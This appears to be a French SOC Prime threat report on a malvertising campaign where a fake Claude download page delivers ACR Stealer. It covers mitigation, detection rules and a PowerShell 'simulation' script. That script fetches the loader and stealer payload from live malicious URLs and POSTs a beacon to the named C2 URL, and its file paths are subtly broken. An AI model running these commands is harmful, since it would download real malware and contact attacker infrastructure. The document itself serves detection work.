Page d’Imitation de Claude Peut Délivrer ACR Stealer

SOC Prime Team

Suivre

Page d’Imitation de Claude Peut Délivrer ACR Stealer

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

Des chercheurs en menaces ont identifié une campagne publicitaire malveillante qui redirige les utilisateurs vers une fausse page de téléchargement de Claude. Le site fournit différentes charges utiles en fonction du système d’exploitation de la victime, avec une chaîne d’infection Windows menant au déploiement de ACRStealer. Les enquêteurs ont lié l’activité à plusieurs domaines compromis et à un serveur de commande et de contrôle utilisé après l’infection. La campagne s’appuie sur des URL obfusquées et un script PowerShell pour compléter la livraison des charges utiles.

Enquête

L’analyste a tracé l’activité depuis la fausse page de Claude initiale à travers plusieurs URL redirigées hébergées sur différents domaines. Au cours de la chaîne d’infection, une archive ZIP, un script PowerShell et une image JPEG ont été téléchargés, suivis par une communication HTTPS avec un domaine de commande et de contrôle. L’analyse du trafic a confirmé que le comportement du réseau après l’infection correspondait à l’infrastructure associée à la famille ACRStealer.

Atténuation

Les organisations devraient bloquer les domaines et URL malveillants identifiés à la périphérie du réseau. Le trafic publicitaire devrait être filtré pour détecter les publicités malveillantes faisant référence à la fausse page de Claude ou à des leurres d’usurpation similaires. La protection des endpoints devrait également être configurée pour détecter les comportements liés à ACRStealer et l’exécution suspecte de PowerShell.

Réponse

Les défenseurs devraient surveiller les connexions sortantes vers le domaine de commande et de contrôle yw.enhanceblabber.cc et alerter sur les téléchargements de l’archive ZIP et du script PowerShell identifiés. Tout hôte présentant une activité liée devrait subir une collecte d’investigation médico-légale pour détecter d’éventuels artefacts ACRStealer et être isolé si le compromis est confirmé.

Flux d’attaque

Nous sommes encore en train de mettre à jour cette partie. Inscrivez-vous pour être notifié

Prévenez-moi

Détections

Comportement d’évasion de défense LOLBAS MSHTA suspect par la détection des commandes associées (via process_creation)

Équipe SOC Prime

26 mai 2026

Voir

Commande et Contrôle suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)

Équipe SOC Prime

26 mai 2026

Voir

IOCs (HashSha256) pour détecter : Possible ACR Stealer depuis la page usurpant Claude

Règles AI SOC Prime

26 mai 2026

Voir

Détection de la distribution d’ACR Stealer via les fausses pages de téléchargement de Claude [Connexion réseau Windows]

Règles AI SOC Prime

26 mai 2026

Voir

Exécution de simulation

Prérequis : Le contrôle prévol Télémetrie & Baseline doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémetrie exacte attendue par la logique de détection.

Narration d’attaque & Commandes :
1. Leur initiale : L’attaquant envoie un email de phishing contenant un lien vers https://fairpoint29.com/. La victime clique sur le lien, qui charge une fausse page de téléchargement de Claude.
2. Exécution du téléchargeur malveillant : La page déclenche automatiquement un téléchargement depuis https://primemetricsa.com/1518925, livrant une charge utile déguisée.
3. Récupération de la charge utile secondaire : Le stub téléchargé contacte https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d pour récupérer le binaire complet d’ACR Stealer.
4. Balise C2 : Une fois exécuté, le malware envoie une balise à https://i.ibb.co/Xx16sbMz/init-block.jpg (une technique qui utilise l’hébergement d’images pour un C2 furtif).
Chaque étape génère une entrée de journal proxy correspondant exactement aux domaines and url les valeurs définies dans la règle Sigma, satisfaisant ainsi la condition de détection.

Script de test de régression :

# -------------------------------------------------
# Simulation de distribution d'ACR Stealer – Règle de déclenchement
# -------------------------------------------------
# Étape 1 : Fausse page de téléchargement de Claude (GET inoffensif)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null

# Étape 2 : Téléchargeur binaire (simulée par un petit fichier de téléchargement)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing

# Étape 3 : Récupération complète de la charge utile
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
  -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing

# Étape 4 : balise C2 (POST d'une petite image pour déguiser le trafic)
$body = [System.Text.Encoding]::UTF8.GetBytes("balise")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
  -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# Fin de la simulation
# -------------------------------------------------

Commandes de nettoyage :

# Supprimer les artefacts téléchargés
Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue

# Vider le cache DNS pour éviter les entrées persistantes
ipconfig /flushdns

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement